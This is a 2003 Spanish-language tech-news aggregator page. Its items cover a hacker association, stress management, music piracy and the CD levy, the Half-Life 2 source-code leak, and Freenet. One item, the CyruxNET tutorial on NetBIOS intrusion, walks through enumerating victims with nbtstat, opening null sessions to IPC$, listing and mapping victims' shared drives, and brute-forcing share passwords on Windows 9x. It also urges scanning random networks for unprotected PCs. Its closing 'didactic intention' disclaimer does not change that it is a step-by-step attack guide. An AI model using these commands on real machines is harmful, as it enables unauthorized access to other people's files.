Una de las actividades que realizan los hackers es la detección de fallos de seguridad en los sistemas. "Si detecta un fallo de seguridad, el hacker avisa al administrador del sistema, su intención nunca es la de dañar el sistema", explicó Garaloces que añadió que "en el momento en que un hacker cobra por sus servicios, ya no lo es". Según una encuesta elaborada por la Asociación Multisectorial de Empresas Españolas de Electrónica y Comunicaciones (Asimelec), las pequeñas y medianas empresas españolas sufren una media de entre dos y tres ataques anuales en sus equipos informáticos por parte de "hackers" que les producen importantes pérdidas económicas.


En este sentido, el presidente de la AIH consideró que debería diferenciarse "el hacker del cracker". "El cracker es el que revienta un sistema porque sí, simplemente para hacer daño" aseguró Garaloces.
Por su parte, "el hacker pretende compartir información y si revienta algún sistema, siempre tiene una razón" como en el caso de las páginas de pornografía infantil, explicó Garaloces. La Asociación para la Información de Hackers "es la primera y la única asociación de este tipo en España" indicó su presidente. La AIH nació el 1 de noviembre de 2001 con el fin de "informar sobre seguridad informática y hacktivismo, sin llevar a cabo acciones de ataque" y actualmente cuenta con 250 socios abonados, cifra que se incrementa cada mes, según declaró Garaloces.

Barcelona. Agencias


FUENTE : http://www.abc.es/internet/noticia.asp?id=211647&dia=hoy

¿Cómo gestionar el cabreo?
Noticia enviada el Domingo 5 de Octubre de 2003 por wolfbcn

La congelación de la imagen es una técnica que permite reducir el estrés y mejorar la salud y el nivel de eficacia y eficiencia profesional. Este ejercicio ayuda a aislar lo que nos estresa y verlo de manera objetiva.



El Diccionario de la Lengua de la Real Academia Española define la palabra cabrear como: Enfadar, amostazar (irritar, enojar..), poner a alguien malhumorado, receloso. En la vida de la empresa, este tipo de enfado puede ser puntual o recurrente, el segundo tipo es más peligroso porque puede enrocarse en la personalidad, propiciando el estrés. Hablando coloquialmente, el estrés se relaciona a dos hechos simultáneos: un estímulo externo denominado estresante y la respuesta emocional y física a tal acción.

Los estímulos buenos inspiran la realización, pero en general, cuando etiquetamos una situación como de estresante nos referimos a un hecho que provoca una reacción interna negativa, amenazante, preocupante... Acumulado en el tiempo, el estrés negativo puede deprimir, enfermar e incluso matar. En un trabajo sobre el tema, publicado en la Harvard Business Review, se habla de gestión interna de calidad refiriéndose a un conjunto de sistemas y técnicas que pueden ayudar a reducir el estrés y mejorar el nivel de salud y la eficacia y eficiencia profesional.

Una de estas técnicas es la llamada congelación de la imagen. Está basada en el concepto de que la percepción consciente es como ver una película, la que percibimos cada momento como un fotograma individual. Cuando la escena se vuelve estresante, la técnica nos permite congelar el fotograma percibido y aislarlo en el tiempo para que podamos observarlo desde un punto de vista individualizado y objetivo, como hacen los comentaristas deportivos cuando analizan los partidos de fútbol. A continuación, detallo las cinco etapas de la técnica congelación de la imagen.

1. Reconocer y desenganchar. Darnos cuenta de que estamos en un peligroso momento de alta emoción. Tomar un tiempo de descanso para poder desconectar, especialmente de los pensamientos y emociones estresantes. La práctica demuestra que el simple hecho de reconocer y desconectar interrumpe la escalada emocional y nos ayuda a ganar objetividad.

2. Respirar a través del corazón. Enfocar conscientemente la atención al mismo tiempo que inhalamos profundamente durante unos cinco segundos imaginando que la respiración fluye a través del corazón; luego exhalar alrededor de cinco segundos visualizando que la expiración fluye a través del plexo solar. Este proceso facilita el salirse de la emoción negativa.

3. Invocar pensamientos positivos. Hacer un sincero esfuerzo para activar sentimientos positivos, como por ejemplo imaginar estar simplemente flotando en el mar de una playa paradisíaca del Caribe y sentir cómo la ingravidez disuelve las tensiones. El poder del pensamiento positivo es un tópico, pero abarca una gran dosis de realidad. Este pensamiento facilita la toma de decisiones y la creatividad por el desbloqueo del impacto del estrés negativo.

4. Preguntarse a uno mismo si hay una alternativa mejor, más eficaz y eficiente para erradicar el estrés que nuestro entorno produce. En muchas relaciones interpersonales difíciles, los problemas son mayormente debidos a la mala química que se produce al chocar dos temperamentos de difícil sintonía; en estos casos la vía de solución radica en poder trabajar con las diferencias, más que en reaccionar negativamente frente a ellas.

5. Notar el cambio en perspectiva. Sólo hay dos formas de afrontar las situaciones tensas: cambiarlas –frecuentemente no se puede– o cambiar la forma de verlas.

Acostúmbrese a buscar lo mejor de las personas y de las situaciones. Comprobará que un enfoque sencillo -no simple- conduce a la calma, al optimismo y a la seguridad, que a su vez conducen a mejorar el estilo de dirección.

Romper el hábito de estresarse
Decíamos al principio que puede gestionarse productivamente el cabreo; este enfado frecuentemente recurrente es una puerta falsa del estrés. Aunque parezca imposible, puede romperse este hábito a través de los cinco pasos del método aquí apuntado; con la práctica, los tres primeros pasos llegan a ser automáticos. A mayor abundamiento, si uno practica también los pasos cuatro y cinco, experimentará que además de quitarse el estrés de encima mejoran sus habilidades directivas.

Está científicamente demostrado que un determinado grado de buen estrés facilita la mejora de la gestión personal, lo malo son los excesos, o sea que, lo recomendable es gestionar el grado de estrés de forma adecuada. Al mejorar su reacción ante los hechos no deseados obtendrá este poco de pimienta indispensable para negociar, convencer y automotivarse. Transforme su cabreo en carburante de eficacia y su vida cambiará.

Si Silvio Berlusconi, al inicio de la presidencia italiana de la Unión Europea, hubiera practicado el método que aquí reseñamos, seguramente no hubiera lanzado el exabrupto que dirigió al parlamentario alemán que le interpeló; tal vez hubiera hecho tres cuartos de lo mismo, pero cuidando las formas -al estilo Winston Churchill- hubiera reafirmado su imagen y no hubiera erosionado su reputación.

José Aguilá
Director general de IOR Consulting


FUENTE : http://www.expansionyempleo.com/edicion/noticia/0,2458,398578,00.html

"No vamos a denunciar a los internautas que descargan música..de momento"
Noticia enviada el Sábado 4 de Octubre de 2003 por wolfbcn

Las discográficas no van a denunciar a los internautas que descargan música sin pagar en nuestro país, como está ocurriendo en EEUU, al menos de momento. Así lo ha asegurado Antonio Guisasola, presidente de la Asociación Fonográfica y Videográfica Española (AFYVE) a El Confidencial. Sin embargo, “aunque es la última de las opciones, no se puede descartar, y en algún momento lo haremos”, matiza.


Fátima Martín El Confidencial .- La asociación que representa a los productores, que reitera que “el mercado español de música se está destruyendo por culpa de la piratería y de Internet”, es consciente de que aquí la situación es muy diferente a la de EEUU, donde 52 de los 261 usuarios de redes de intercambio de archivos de música (P2P) denunciados por la RIAA (Asociación de la Industria Discográfica) ya han pagado extrajudicialmente entre 2.500 y 7.500 dólares por violar derechos de propiedad.

“Sería difícil encontrar a un juez que nos diera la razón en un litigio como éste”, reconoce Guisasola. Estas declaraciones se producían el mismo día en que una jueza de Barcelona obligaba a devolver a sus dueños, CD World, 500.000 discos compactos y DVD´s vírgenes que la Policía incautó en lo que consideró “el mayor alijo de Europa” al considerar que no violaba la legalidad. La operación policial respondió a una denuncia conjunta de la AFYVE y la Sociedad General de Autores (SGAE).

Precisamente la SGAE y otras entidades de gestión de derechos de autor como AIE, AISGE, EGEDA, DAMA y CEDRO firmaron en agosto un acuerdo con la Asociación Multisectorial de Empresas Españolas de Electrónica y Comunicaciones (ASIMELEC), para imponer un canon a cada unidad de CD y DVD virgen con el objeto de compensar la copia privada, un derecho tipificado en la vigente Ley de Propiedad Intelectual.

Este canon no convence a la AFYVE por una sencilla razón: “Los productores estamos contra el canon porque estamos en contra de la copia privada. Preferimos cobrar unidades”, asegura Guisasola. Obviamente, su opción son las “medidas tecnológicas” (anticopia), como la que protegía la primera edición del nuevo disco de Alejandro Sanz, No es lo mismo. La Asociación de Internautas, que incluso llegó a pedir la retirada del disco en cuestión, considera inadmisible que a todo comprador de CD o DVD virgen, que no necesariamente adquiere ese producto para copiar canciones o películas, tenga que pagar un canon por un concepto que muchas unidades impiden con fórmulas antipiratería. De hecho, según el presidente de AFYVE, “todos los DVD´s y todos los discos que sacan a la venta BMG y EMI están protegidos con medidas anticopia”. Así que, concluye: “el canon debería desaparecer en la medida en que se generalizan las medidas tecnológicas”. Sin embargo, a los `manteros´ sí les pareció lo mismo el disco de Alejandro Sanz con o sin medidas antipiratería, pues el CD se vendía en la calle antes incluso de que saliera al mercado al módico precio de 2 euros y además, reproducible. La AI ya ha advertido que plantará batalla al canon “mediante acciones que harán palidecer a las que ya ejecutamos en junio del 2000 por la Tarifa Plana”.

Por si todo esto fuera poco, en la mente de todo el sector aún está fresco el intento fallido de perseguir a 95.000 (luego 4.000) usuarios que intercambiaban software en redes Peer to Peer por parte de un abogado, Xavier Ribas, en representación de 38 anónimas empresas de programas informáticos (sin incluir a las miembros de la BSA como Microsoft). Aunque la amenaza trascendió en julio, la denuncia aún no se ha presentado. En su momento, la Brigada de Delitos Tecnológicos de la Policía se desmarcó de esta iniciativa, y aclaró que no delinque quien no tiene ánimo de lucro, como es el caso de los internautas que comparten archivos.

Ante esta situación, para el presidente de la AFYVE, la solución pasa por “la conciencia social”, que en el asunto del `top manta´ “el Gobierno haga cumplir las leyes” y que en Internet “exista un negocio legal de música”.


FUENTE : http://www.internautas.org/article.php?sid=1254&mode=thread&order=0

Acceso a PC´s ajenos por NetBIOS
Noticia enviada el Viernes 3 de Octubre de 2003 por wolfbcn

ASALTO POR NETBIOS

¿NETBIOS?
ENTRANDO EN LA MÁQUINA
CRAKEANDO LOS PASWORDS
MÉTODO RÁPIDO


En esta sección vamos a tratar de explicar primero qué es NETBIOS y como se puede establecer una comunicación por NETBIOS, para después, y mas importante, citar las mejores utilidades para realizar este ataque, gracias a las cuales el hack por NetBIOS se ha convertido un casi un mero trámite, hablaremos al final de algunos programillas muy nuevos que son capaces, gracias a un bug descubierto en el año 2000 por NSFOCUS, de desvelar los paswords de los recursos compartidos de cualquier windows 9x/Me no parcheado, en menos de un minuto.



¿NETBIOS?:

NETBIOS (Network Basic Output/Input System que en español Sistema Básico de Red Entrada/Salida) es el protocolo que se encarga de compartir los archivos y las impresoras entre varios ordenadores. Tal vez habrás oído mencionar alguna vez el NETBEUI (NetBIOS Extended User Interface o Interfaz de Usuario Extendido),pues bien, es lo mismo pero NETBIOS lo desarrollaron IBM y Sytek, y NETBEUI lo desarrollo microsoft, tratando de optimizar el NETBIOS para Windows.

Es habitual oír hablar simplemente del "139" este es el puerto por el que funciona este protocolo, el 137 y el 138 también forman parte de este protocolo,

NetBIOS-ns 137 TCP / UDP NetBIOS Name Service

NetBIOS-dgm 138 TCP / UDP NetBIOS Datagram Service

NetBIOS-ssn 139 TCP / UDP NetBIOS Session Service

Para poder comprobar este ataque con éxito debes tener instalado el protocolo en tu PC, para ello, si tienes Windows 95 / 98 /Me debes ir a

INICIO \ CONFIGURACION \ PANEL DE CONTROL \ RED e instalar el cliente para redes Microsoft, el protocolo TCP/IP y activar "Compartir archivos e impresoras", si utilizas el Windows NT4 / 2000 / XP debes hacer lo mismo pero, en estos sistemas se hace en cada conexión a Internet por separado (sólo necesitas activarlo en aquella que vayas a utilizar para el ataque.


ENTRANDO POR NETBIOS

Lo que se explica a continuación se puede utilizar desde un windows para atacar otro windows, aunque el ataque está pesado para NT sería muy similar si quisiéramos atacar un Windows 9x, pero no voy a entrar en muchos detalles, porque debido a que hoy en día existen maneras mas fáciles y rápidas de hacerlo, esta sección la he puesto sólo como curiosidad.

Una vez elegida la máquina a la que quieres entrar solo necesitas el Ms-Dos, o el Símbolo de Sistema, que para el caso es lo mismo, pues bien abres una ventana y escribes:

nbtstat -A 192.168.0.1

(si lo que conoces es la IP de la victima)

nbtstat -a nombre_del_PC

(si conoces solo su nombre)

pueden ocurrir varias cosas, si recibes:

C:\WINDOWS>nbtstat -A 192.168.0.1

Host not found.

Pues queda claro que "not found" , o no está conectado, o no comparte archivos, o no existe (mira a ver si lo escribiste bien)

Si la respuesta es:

C:\WINDOWS>nbtstat -A 192.168.0.1

NetBIOS Remote Machine Name Table

Name Type Status

--------------------------------------------------------------

NAME <00> UNIQUE Registered

WORKGROUP <00> GROUP Registered

NAME <03> UNIQUE Registered

MAC Address = 00-00-00-00-00-00

Pues aunque parezca mejor, para el caso nos da igual, porque aunque si lo tiene instalado, no comparte nada.

Si recibimos:

C:\WINDOWS>nbtstat -A 192.168.0.1

NetBIOS Remote Machine Name Table

Name Type Status

----------------------------------------------------------------

NAME <00> UNIQUE Registered

WORKGROUP <00> GROUP Registered

NAME <03> UNIQUE Registered

NAME <20> UNIQUE Registered

WORKGROUP <1E> GROUP Registered

MAC Address = 00-00-00-00-00-00

En este si... la diferencia importante es el <20> que corresponde al "File Server Service" (Servicio servidor de archivos), solo los PC que tienen el <20> tienen archivos compartidos y accesibles.

El IPC$ (Inter-Process Communication) es un recurso compartido oculto estándar en una máquina NT , y es utilizado por el servidor para establecer comunicación con otros equipos.

Conectándose al IPC$ un intruso puede establecer una comunicación valida con el servidor NT. Conectándose como null, el intruso puede establecer dicha comunicación sin necesidad de introducir user:password.

Para ello se utiliza el siguiente comando:

c:\>net use \\[ip_de_la_víctima]\ipc$ "" /user:""

The command completed successfully.

Puedes ver qué comparte esa computadora sin necesidad de entrar, para ello utiliza el comando NET

C:\>net view \\192.168.0.1

recibirás algo así:

Shared resources at 192.168.0.1

Share name Type Used as Comment

----------------------------------------------------

NETLOGON Disk Logon server share

Test Disk

The command completed successfully.

Es posible que ocurra:

C:\>net view \\192.168.0.1

System error 5 has occurred.

Entonces primero tienes que establecer la “null session”

C:\>net use \\192.168.0.1\ipc$ "" /user:""

The command completed successfully.

Ahora el C:\>net view \\192.168.0.1

si funcionará

Para conectar a la carpeta compartida.

The command completed successfully.

Si escribes net use ahora, recibirás algo así:

Status Local Remote Network

-------------------------------------------------------------

OK X: \\123.123.123.123\test Microsoft

OK \\123.123.123.123\test Microsoft

The command completed successfully.

Para acceder directamente al PC solo tienes que:

*escribir en el explórer \\192.168.0.1

*INICIO / EJECUTAR y poner lo mismo \\192.168.0.1

*Botón derecho en Mis Sitios de Red > Buscar Equipos... y lo mismo 192.168.0.1

*En una ventana de símbolo de sistema escribir:

C:\>net use x: \\192.168.0.1\test

y después

C:\>dir x:

Este ataque solo funcionará si la carpeta compartida no tiene pasword.

Recuerda que un intruso no está limitado a los recursos compartidos que aparecen con el net view.

Un intruso que conozca NT sabe que existen otros recursos compartidos ocultos para uso administrativo. Por defecto NT

crea el IPC$ y otro por cada partición (por ejemplo una máquina que tiene C, D, y E tendrá sus correspondientes C$, D$, y E$).

También hay un ADMIN$ que pertenece a la ruta donde fue instalado el NT (por ejemplo si instalaste NT en C:\winnt, entonces ADMIN$ apunta exactamente a esa parte del disco).


CRAKEANDO LOS PASWORDS
----[esta parte está tomada del grupo DeepZone Digital Security]----

El 24 de agosto del 2000 NS-FOCUS - http://www.nsfocus.com - hacía pública una vulnerabilidad en la implementación del protocolo NETBIOS en todos los sistemas operativos corriendo el kernel 9x de la empresa Microsoft (tm), incluyendo el nuevo Windows ME y las versiones más avanzadas de Windows 98.

La vulnerabilidad en si misma no es más que un error de implementación a la hora de establecer la longitud del password para validarlo ante una petición NETBIOS.

Los sistemas vulnerables obtienen el número de bytes a comparar para el password del paquete que reciben del cliente.

Un usuario malicioso podría establecer la longitud del password a 1 byte intentar un ataque por fuerza bruta contra el password compartido. El número de intentos que debería realizar sería tan sólo de 256 (2 elevado a 8).

El exploit que proporciona NS-FOCUS en su WEB modifica el cliente de samba en su versión 2.0.6 para atacar los recursos compartidos de un sistema vulnerable.


METODO RÁPIDO
Hoy en día ya no se usa todo ese método de introducir los comandos, han surgido muchas utilidades que automatizan todo el proceso.

Si no estás detrás de ningún PC en concreto, y lo que quieres es probar todas estas cosas con un PC aleatorio (por supuesto, sin ánimo de causar ningún daño) lo único que necesitas es elegir un escaneador adecuado ,es decir, de NetBIOS, o al menos un escaneador de puertos apuntando al 139, después escanear una red, y verás como empiezan a surgir muchos mas ordenadores mal protegidos, o desprotegidos de los que te imaginas.

En la sección de utilidades podrás encontrar algunos de los mejores.

Texto escrito por CyruxNET


Este texto está hecho con intención didáctica, no nos hacemos responsables del mal uso que se haga de lo aquí explicado


FUENTE : http://cyruxnet.com.ar/netbios.htm

Robado el código fuente de Half Life 2
Noticia enviada el Viernes 3 de Octubre de 2003 por alex

Circulan por la red unas capturas que pretenden demostrar que ha sido robado el código fuente de la nueva versión de halflife. En las capturas puede verse la estructura de directorios y fragmentos del código fuente en C++.

De ser cierto, si Valve no modifica la versión definitiva, podríamos ver una invasión de cheaters (¿seguridad por oscuridad?) en las partidas online de la nueva versión del juego.

Las capturas están aquí.

Más info en Conecta2DT

Fuente de la noticia:
BandaAncha.st

Más noticias de interés:
Hosts/Delude, el troyano secuestrador
Vulnerabilidad por desbordamiento de búfer en mIRC
Release de Slackware Linux 9.1

Docenas de miles de folios, o un CD injusto
Noticia enviada el Miércoles 1 de Octubre de 2003 por wolfbcn


En los últimos años ya nos hemos acostumbrado a ver al Ministro de Economía, Cristóbal Montoro, presentando en el Congreso los presupuestos generales del estado. Hasta ahora, dichos presupuestos se materializaban en miles de folios, agrupados en un buen número de volúmenes. El peso de tanto papel obligaba a que esos documentos fueran movidos por operarios, que incluso se ayudaban con una plataforma rodante, para su traslado. Al final, Montoro se hacía la foto junto a esos mamotretos. Pero este año todo ha sido más sencillo, y el Ministro no ha necesitado ayuda: él mismo portaba un único CD en el que estaba incluida toda esa documentación.

Es estupendo que el Gobierno se modernice, y que ahorremos en kilos de papel. Con ello, se habrá salvado más de un árbol y además habremos economizado en el coste de la operación. Como contribuyente solo puedo alegrarme y felicitar a Cristóbal Montoro.

Pero lo que no me alegra es que ese CD se haya comprado pagando un canon adicional a las sociedades que representan a los autores y editores, principalmente la SGAE. No me parece aceptable que la asociación que representa a las distribuidoras de CDs nos grabe con un extraño "impuesto" la venta de cualquier CD, independientemente del uso que se le vaya a dar a ese CD. No entiendo por qué motivo los autores y editores tienen que recibir una remuneración económica cuando el Ministro Montoro decide grabar los presupuestos generales del estado en un CD. Como contribuyente, estoy indignado de que una parte de mis impuestos sea utilizada para enriquecer Joaquín Sabina o Ana Belén.

Estoy enfadado con la SGAE que solo parece preocupada de incrementar sus ingresos por cualquier vía. Estoy enfadado con los distribuidores de CDs, que han aceptado el chantaje. Estoy enfadado con el Gobierno, que permite esta tropelía, instaurada hace ya un mes, y mira para otro lado sin querer enfrentarse a este abuso. También estoy enfadado con los partidos políticos, los que sustentan al gobierno y los de la oposición, que siguen sin querer posicionarse en este tema. Estoy defraudado con el sistema judicial, el Defensor del pueblo, el Tribunal de defensa de la competencia...

En fin, yo también necesito CDs, pero creo que voy a comprarlos a través de Internet, con una empresa extranjera que no cobre este injusto canon. También estoy decidido a no volver a comprar ningún disco (música o película) mientras se mantenga este canon indiscriminado.

01/10/03. Antonio Caravantes (antonio@caravantes.com)



FUENTE : http://www.caravantes.com/arti03/canon.htm

Freenet, una red sin censura y escalable
Noticia enviada el Miércoles 1 de Octubre de 2003 por wolfbcn

Freenet es un proyecto que pretende crear una infraestructura de red
anónima y no censurable, y tan escalable como la propia Internet.

Freenet es un proyecto de Ian Clarke, y proporciona anonimato tanto a
los proveedores de datos como a los usuarios que se los descargan. Tanto
es así, que los nodos intermedios ni siquiera conocen el contenidos de
los archivos que están atravesando sus máquinas y se almacenan en sus
discos duros. El objetivo es lograr una red descentralizada y escalable,
que asegure la privacidad de las comunicaciones por Internet.

Aunque la tecnología está sirviendo de refugio para muchos usuarios P2P
preocupados por las denuncias de violación de copyright de la RIAA y
asociaciones similares, la motivación inicial de Freenet fue crear una
infraestructura en la cualquier usuario pudiese publicar información y
recibirla sin temor a represalias en regímenes políticos poco dados a la
libertad de expresión, como China o Cuba.

El proyecto Freenet distribuye su tecnología, disponible en lenguaje
java, de forma libre y gratuita a través de su página web. Se recomienda
echar un vistazo a la documentación de la tecnología, también disponible
online.


Opina sobre esta noticia:
http://www.hispasec.com/unaaldia/1800/comentar

Más Información:

The Free Network Project
http://www.freenetproject.org/

Freenet 0.5.2 Released
http://yro.slashdot.org/article.pl?sid=03/07/16/1931225

Documentación inspirada en Freenet
http://citeseer.nj.nec.com/context/1354204/420356

Giving Sharers Ears Without Faces
http://www.wired.com/news/culture/0,1284,59448,00.html

Hard for file swappers to hide identity
http://news.zdnet.co.uk/internet/0,39020369,2137474,00.htm

Interest in anonymous file-trading grows
http://www.newscientist.com/news/news.jsp?id=ns99993950

P2P's little secret
http://news.com.com/2100-1029-1023735.html


Jesús Cea Avión
jcea@hispasec.com


FUENTE : http://www.hispasec.com/unaaldia/1800